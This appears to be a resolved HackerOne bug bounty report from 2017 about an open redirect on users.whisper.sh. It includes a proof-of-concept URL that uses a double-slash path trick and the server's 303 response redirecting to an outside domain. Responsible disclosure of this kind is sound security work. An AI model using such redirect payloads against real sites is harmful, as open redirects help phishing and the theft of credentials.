Open Redirection Found in users.whisper.sh
Unknown
Vulnerability Details
I found that one of your subdomains users.whisper.sh is vulnerable to open redirection.
POC: `http://users.whisper.sh//google.com/%2f..`
Response:
```
HTTP/1.1 303 See Other
X-Powered-By: Express
Location: //google.com/%2f../
Set-Cookie:
CM; Path=/; HttpOnly
Date: Sat, 19 Aug 2017 14:22:50 GMT
Content-Length: 34
Via: 1.1 google
Redirecting to //google.com/%2f../
```
Actions
View on HackerOneReport Stats
- Report ID: 261592
- State: Closed
- Substate: resolved
- Upvotes: 8